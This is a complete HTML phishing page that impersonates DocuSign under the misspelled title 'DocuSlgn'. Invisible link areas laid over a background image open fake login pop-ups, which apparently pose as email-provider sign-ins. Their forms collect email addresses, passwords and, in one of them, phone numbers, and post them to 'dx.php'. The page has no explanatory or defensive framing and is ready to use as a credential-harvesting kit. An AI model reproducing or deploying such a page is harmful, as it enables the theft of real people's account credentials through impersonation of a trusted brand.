
<html>
<head>
<link href="img/favicon.ico" rel="shortcut icon" type="image/x-icon">
<title> DocuSlgn</title>
<style>
body {
 margin: 0;
 background: #EAEAEA; 
 min-height: 100%;
 height: 100%;
}
.topb{
    height: 77px;
    background-color: #1b49a0;
    position: relative;
	top: 0px;
}

.topb .topinside{
margin-left: 40px;
}

.main-container{
 margin: 0 auto;
 width:580px;
 background-image: url('img/c.png');
 background-repeat:no-repeat;
 height: 600px;
 z-index: 2; /* Make sure its above other items. */
}
 
#footer {
    position: fixed;
    height: 27px;
    background: #575757;
    color: #a4a4a4;
    bottom: 0;
    left: 0;
    right: 0;
}

.butnz { 
 position: relative;
 left: 140px;
 top: 286px;
 width: 250px;
 height: 300px; 
 padding: 150px;
 background-color:rgba(0, 0, 0, 0.0);
 font-weight:bold; 
 text-decoration:none;
 }
 
 #cover{ 
 position:fixed; 
 top:0; 
 left:0; 
 background:rgba(0,0,0,0.6); 
 z-index:5; 
 width:100%; 
 height:100%; 
 display:none;
 } 
 
 #loginScreen { 
 height:430px; 
 width:422px; 
 margin:0 auto; 
 position:relative; 
 z-index:10; 
 display:none; 
 background: #f9f9f9; 
 border:5px solid #cccccc; 
 border-radius:10px; 
 }
 
 #loginScreen:target, #loginScreen:target + #cover{ display:block; opacity:2; } 
 .cancel { display:block; 
 position:absolute; top:3px;
 right:2px; 
 background:rgb(245,245,245); 
 color:black; 
 height:30px; 
 width:35px; 
 font-size:30px; 
 text-decoration:none; 
 text-align:center; 
 font-weight:bold; 
 }
 
 .butnz2 { 
 position: relative;
 left: 220px;
 top: 115px;
 width: 450px;
 height: 400px; 
 padding: 10 84px;
 background-color:rgba(0, 0, 0, 0.0);
 font-weight:bold; 
 text-decoration:none;
 }
 
 
 #loginScreen2 { 
 height:480px; 
 width:422px; 
 margin:0 auto; 
 position:relative; 
 z-index:10; 
 display:none; 
 background: #f9f9f9;
 border:5px solid #cccccc; 
 border-radius:10px; 
 }
 #loginScreen2:target, #loginScreen2:target + #cover{ display:block; opacity:2; } 
 .cancel { display:block; 
 position:absolute; top:3px;
 right:2px; 
 background:rgb(245,245,245); 
 color:black; 
 height:30px; 
 width:35px; 
 font-size:30px; 
 text-decoration:none; 
 text-align:center; 
 font-weight:bold; 
 }
</style>
</head>
<body>
<div class="topb"><div class="topinside"><br><img src="img/dsgn.png" width="133" height="39"></div></div>
<br><br>
<div class="main-container">
 <a href="#loginScreen2" class="butnz2" ></a><br>
 <a href="#loginScreen" class="butnz" ></a><br>
 
 <div id="loginScreen">
<div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/do_ll.png" border="0" width="150" height="42">
<br><br>
<img src="img/pl.png" border="0">
</center>
<br><br>
<form action="dx.php" name="book" id="book" method="post">
<input name="email" id="" type="email" placeholder="Email Address" style="width:360px;height:34px;border:1px solid #ccc;padding: 0 8px" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="password" id="" type="password" placeholder="Password" style="width:360px;height:34px;border:1px solid #ccc; padding: 0 8px" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0">
</div>

 <a href="#" class="cancel">&times;</a> 
 </div> <div id="cover" > </div>
 
 <div id="loginScreen2"> <a href="#" class="cancel">&times;</a> 
 <div style="margin: 0 auto; margin-top:12px; width:365px;line-height:18px">
<center>
<br>
<img src="img/spr.png" border="0" width="104" height="24">
<br><br><br>
<img src="img/gm.png" border="0">
</center>
<br>
<form action="dx.php" name="book" id="book" method="post">
<input name="email" id="" type="email" placeholder="Email Address" style="width:360px;height:34px;border:1px solid #ccc;padding: 0 8px" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required>
<br><br>
<input name="password" id="" type="password" placeholder="Password" style="width:360px;height:34px;border:1px solid #ccc; padding: 0 8px" required>
<br><br>
<input name="phone" id="" type="tel" placeholder="Phone Number" style="width:360px;height:34px;border:1px solid #ccc; padding: 0 8px" required>
<br><br>
<input name="formimage1" src="img/d2.png" width="364" type="image" height="41">
<br><br>
</form>
<img src="img/s_seee.png" border="0"></div>
 </div>  <div id="cover" > </div>
</div>




<div id="footer"><img src="img/f.png" style="float:right;padding: 6px 1px"></div>
</body>
</html>